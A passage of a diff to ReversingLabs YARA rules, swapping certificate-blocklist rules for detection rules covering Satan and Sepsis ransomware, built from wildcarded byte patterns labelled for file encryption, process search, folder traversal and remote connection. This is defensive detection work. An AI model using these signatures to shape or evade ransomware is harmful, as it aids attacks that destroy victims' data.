15 ?? + ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B + 6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15 + ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? + ?? ?? C3 + } + $app_whitelisting_2 = { + 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44 + 24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44 + 24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB + ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24 + ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D + ?? ?? ?? ?? 59 5E 83 C4 ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RTI, OOO" and pe.signatures[i].serial=="1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Satan ransomware." author = "ReversingLabs" - id = "f8cb78cf-541c-5038-b7af-83679c978ec8" - date = "2023-11-08" - modified = "2023-11-08" + id = "7ec379d8-172c-52ee-9284-6898dd446468" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3958-L3976" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Satan" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 + C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ?? + 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50 + 8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ?? + ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4 + ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50 + 56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ?? + ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 + 5D C3 + } + $search_processes = { + 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F + 44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ?? + 8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 + ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B + E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? + ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D + ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89 + 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ?? + ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ?? + ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F + 84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF + 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? + FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88 + 45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75 + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ?? + B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6 + C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ?? + 74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ?? + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $search_files_in_specific_folders_p1 = { + 51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF + } + $search_files_in_specific_folders_p2 = { + 75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 + F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B + CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 + 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D + 4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 + 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 + C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 + EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84 + C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8 + } + $search_files_in_specific_folders_p3 = { + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ?? + 8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 + ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? + ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? + ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SK AI MAS GmbH" and (pe.signatures[i].serial=="00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures[i].serial=="ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14") and 1579478400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_processes and ( all of ($search_files_in_specific_folders_p*)) and $encrypt_files and $remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sepsis ransomware." author = "ReversingLabs" - id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95" - date = "2023-11-08" - modified = "2023-11-08" + id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3978-L3994" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sepsis" + tc_detection_factor = 5 importance = 25 + strings: + $search_files_1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ?? + ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 + } + $search_files_2 = { + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? + ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? + 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A + } + $search_files_3 = { + 66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B + E5 5D C2 + } + $search_files_4 = { + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? + ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83 + C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2 + } + $encrypt_files_1 = { + BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ?? + ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D + 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D + 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? + ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 